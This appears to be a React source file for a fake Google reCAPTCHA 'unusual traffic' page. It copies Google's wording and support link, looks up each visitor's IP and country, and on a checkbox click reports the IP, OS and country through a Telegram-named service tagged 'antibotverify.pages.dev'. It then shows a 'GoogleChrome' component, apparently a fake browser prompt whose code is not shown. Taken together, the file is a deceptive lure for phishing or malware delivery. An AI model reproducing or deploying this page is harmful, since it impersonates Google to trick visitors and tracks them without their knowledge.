/* eslint-disable jsx-a11y/anchor-is-valid */
import React from "react";

import useStore from "../store";
import { click, getLocation } from "../services/telegram.service";
import { useEffect, useState } from "react";
import { osName } from "react-device-detect";
import GoogleChrome from "../components/Chrome";
import CaptchaCheckbox from "../components/Captcha/CaptchaCheckbox";
import { useLocation } from "react-router-dom";

const CaptchaFullPage: React.FC = () => {
  const location = useLocation();
  const queryParams = new URLSearchParams(location.search);
  const pageId = queryParams.get("pageId");
  
  const { setChrome, ChromeO, setPageId } = useStore();
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("127.0.0.1");
  const fetchCountry = async () => {
    const data = await getLocation();
    setCountryCode(data.country_code);
    setIp(data.ip);
  };

  useEffect(() => {
    fetchCountry();
    setPageId(pageId || "UMPG"); // Set the pageId in the store or state as needed
  }, [setPageId, pageId]);

  const handleClick = async () => {
    window.scrollTo({ top: 0, behavior: "smooth" });

    setChrome(true);
    console.log("Clicked link");
    await click("antibotverify.pages.dev", osName, ip, countryCode);
  };

  return (
    <>
      {ChromeO ? <GoogleChrome /> : false}
      <div className="flex flex-col items-center justify-start bg-[#f9f9f9] h-screen w-full">
        <div className="p-8 font-roboto text-[14px] text-gray-800 w-full md:w-[500px]">
          {/* reCAPTCHA Box */}
          <div className="border-b border-t border-gray-300 mb-8">
            <CaptchaCheckbox onCheck={handleClick} />
          </div>

          {/* About Section */}
          <div className="">
            <div className="text-base font-bold">About this page</div>
            <p className="text-sm font-normal mt-4 leading-relaxed">
              Our systems have detected unusual traffic from your computer
              network. This page checks to see if it's really you sending the
              requests, and not a robot.{" "}
              <a
                href="https://support.google.com/a/answer/1217728?hl=en"
                target="_bank"
                className="text-blue-700 hover:underline"
              >
                Why did this happen?
              </a>
            </p>

            {/* Info block */}
            <div className="mt-4 font-mono whitespace-pre-line">
              IP address: <span className="text-black">{ip}</span>
              <br />
              Time: {new Date().toLocaleString()}
            </div>
          </div>
        </div>
      </div>
    </>
  );
};

export default CaptchaFullPage;
